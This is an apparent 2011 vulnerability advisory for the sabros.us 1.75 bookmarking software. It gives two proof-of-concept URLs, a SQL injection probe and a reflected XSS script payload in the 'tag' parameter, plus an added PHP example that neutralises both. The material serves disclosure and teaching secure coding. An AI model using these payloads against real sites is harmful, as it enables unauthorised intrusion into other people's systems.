Code:
# exploit title: xss/sql injection in sabro.us 1.75
# date: 14.o3.2o11
# author: lemlajt
# software : Sabro.us
# version: 1.75
# tested on: linux
# cve : 
#

PoC : 
1. sqli:
http://localhost/www/cmsadmins/sabrosus1-75/sabrosus//index.php?tag='

2. xss
http://localhost/www/cmsadmins/sabrosus1-75/sabrosus//index.php?tag="><script>alert(1)</script>

Details:
(...)
<title>sabros.us/<?=$Sabrosus->siteName?><?
if ((isset($_GET["tag"])) && (!empty($_GET["tag"]))) {
    $tag = $_GET["tag"];
    echo " - ".htmlspecialchars($tag);
}
?></title>

(...)

# regards,
# lemlajt
# *
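
One way to handle the `tag` parameter so that neither request above has any effect, as an added example that is not part of the original advisory or of the sabros.us code base. The `links` table, the helper names and the `<input>` element are hypothetical, and the block assumes PHP 7+ with the pdo_sqlite extension.

```php
<?php
// Added example: schema, table and function names are hypothetical, not sabros.us code.

// Constructed in-memory database standing in for the bookmark store.
function demo_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE links (title TEXT, tag TEXT)');
    $ins = $db->prepare('INSERT INTO links (title, tag) VALUES (?, ?)');
    foreach ([['PHP manual', 'php'], ['OWASP', 'security']] as $row) {
        $ins->execute($row);
    }
    return $db;
}

// The tag is bound as a parameter, so a quote in it stays data
// and never becomes part of the SQL text.
function links_for_tag(PDO $db, string $tag): array {
    $st = $db->prepare('SELECT title FROM links WHERE tag = ?');
    $st->execute([$tag]);
    return $st->fetchAll(PDO::FETCH_COLUMN);
}

// Encode for HTML text and quoted attribute values alike:
// ENT_QUOTES covers both " and ', so "> cannot close an attribute.
function h(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render(PDO $db, array $get): string {
    // Reject arrays (?tag[]=x) and missing values before use.
    $tag = isset($get['tag']) && is_string($get['tag']) ? $get['tag'] : '';
    $out = '<input type="text" name="tag" value="' . h($tag) . '">' . "\n";
    foreach (links_for_tag($db, $tag) as $title) {
        $out .= '<li>' . h($title) . "</li>\n";
    }
    return $out;
}

$db = demo_db();
// Constructed inputs: a normal tag plus the two request values from the PoC.
foreach (['php', "'", '"><script>alert(1)</script>'] as $tag) {
    echo render($db, ['tag' => $tag]), "---\n";
}
```

With the single quote the query returns no rows instead of failing, and the second value is emitted as `&quot;&gt;&lt;script&gt;...` inside the attribute.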